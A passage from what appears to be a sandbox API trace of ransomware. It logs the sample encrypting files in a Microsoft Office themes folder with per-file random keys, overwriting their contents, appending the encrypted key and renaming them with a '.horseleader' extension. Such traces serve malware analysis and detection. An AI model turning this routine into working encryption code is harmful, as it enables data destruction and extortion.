(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.150] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.150] CloseHandle (hObject=0x158) returned 1 [0246.150] GetProcessHeap () returned 0x780000 [0246.151] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.151] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BLUECALM", cAlternateFileName="")) returned 1 [0246.151] lstrcmpiW (lpString1="BLUECALM", lpString2="Windows") returned -1 [0246.151] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM") returned 68 [0246.151] lstrcmpW (lpString1="BLUECALM", lpString2=".") returned 1 [0246.151] lstrcmpW (lpString1="BLUECALM", lpString2="..") returned 1 [0246.151] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.151] GetProcessHeap () returned 0x780000 [0246.151] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.151] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*") returned 70 [0246.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.152] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.152] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\.") returned 70 [0246.152] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.152] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.152] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.152] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\..") returned 71 [0246.152] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.152] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.152] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c2ae00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5f775610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe6c2ae00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xc2ba, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BLUECALM.ELM", cAlternateFileName="")) returned 1 [0246.152] lstrcmpiW (lpString1="BLUECALM.ELM", lpString2="Windows") returned -1 [0246.152] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM") returned 81 [0246.152] StrStrIW (lpFirst="BLUECALM.ELM", lpSrch=".horseleader") returned 0x0 [0246.152] lstrcmpW (lpString1="BLUECALM.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.152] lstrcmpW (lpString1="BLUECALM.ELM", lpString2="_uninstalling_.png") returned 1 [0246.153] lstrlenW (lpString=".testttjffg") returned 11 [0246.153] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM", lpSrch=".testttjffg") returned 0x0 [0246.153] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.153] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.153] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.153] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM") returned 81 [0246.154] StrStrW (lpFirst="BLUECALM.ELM", lpSrch=".txt") returned 0x0 [0246.154] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=49850) returned 1 [0246.154] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.156] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.157] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.158] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.158] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.158] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.158] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x22ba, lpOverlapped=0x0) returned 1 [0246.159] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffdd46, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.159] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x22ba, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x22ba, lpOverlapped=0x0) returned 1 [0246.159] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.159] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.159] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.159] CloseHandle (hObject=0x1a4) returned 1 [0246.160] GetProcessHeap () returned 0x780000 [0246.160] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.160] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM.horseleader") returned 93 [0246.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.elm.horseleader")) returned 1 [0246.165] GetProcessHeap () returned 0x780000 [0246.165] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.165] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x227, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BLUECALM.INF", cAlternateFileName="")) returned 1 [0246.165] lstrcmpiW (lpString1="BLUECALM.INF", lpString2="Windows") returned -1 [0246.165] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF") returned 81 [0246.165] StrStrIW (lpFirst="BLUECALM.INF", lpSrch=".horseleader") returned 0x0 [0246.165] lstrcmpW (lpString1="BLUECALM.INF", lpString2="#Decrypt#.txt") returned 1 [0246.165] lstrcmpW (lpString1="BLUECALM.INF", lpString2="_uninstalling_.png") returned 1 [0246.165] lstrlenW (lpString=".testttjffg") returned 11 [0246.165] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF", lpSrch=".testttjffg") returned 0x0 [0246.165] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.165] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.166] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.166] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF") returned 81 [0246.167] StrStrW (lpFirst="BLUECALM.INF", lpSrch=".txt") returned 0x0 [0246.167] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=551) returned 1 [0246.168] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x227, lpOverlapped=0x0) returned 1 [0246.169] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdd9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.169] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x227, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x227, lpOverlapped=0x0) returned 1 [0246.169] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.170] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.170] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.170] CloseHandle (hObject=0x1a4) returned 1 [0246.170] GetProcessHeap () returned 0x780000 [0246.170] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.170] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF.horseleader") returned 93 [0246.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.inf.horseleader")) returned 1 [0246.180] GetProcessHeap () returned 0x780000 [0246.180] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.180] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6d2cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x618, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.180] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.180] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 80 [0246.180] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.180] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.180] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.180] lstrlenW (lpString=".testttjffg") returned 11 [0246.180] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.180] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.180] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.180] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.181] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 80 [0246.181] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.181] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1560) returned 1 [0246.181] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x618, lpOverlapped=0x0) returned 1 [0246.184] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff9e8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.184] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x618, lpOverlapped=0x0) returned 1 [0246.184] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.184] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.185] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.185] CloseHandle (hObject=0x1a4) returned 1 [0246.185] GetProcessHeap () returned 0x780000 [0246.185] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.185] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.horseleader") returned 92 [0246.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.horseleader")) returned 1 [0246.186] GetProcessHeap () returned 0x780000 [0246.186] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.186] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x80f1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.186] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.186] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 81 [0246.186] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.187] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.187] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.187] lstrlenW (lpString=".testttjffg") returned 11 [0246.187] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.187] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.187] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.187] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.187] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 81 [0246.188] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.188] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=33009) returned 1 [0246.188] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.191] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.191] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.192] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x30f1, lpOverlapped=0x0) returned 1 [0246.192] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffcf0f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x30f1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x30f1, lpOverlapped=0x0) returned 1 [0246.192] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, 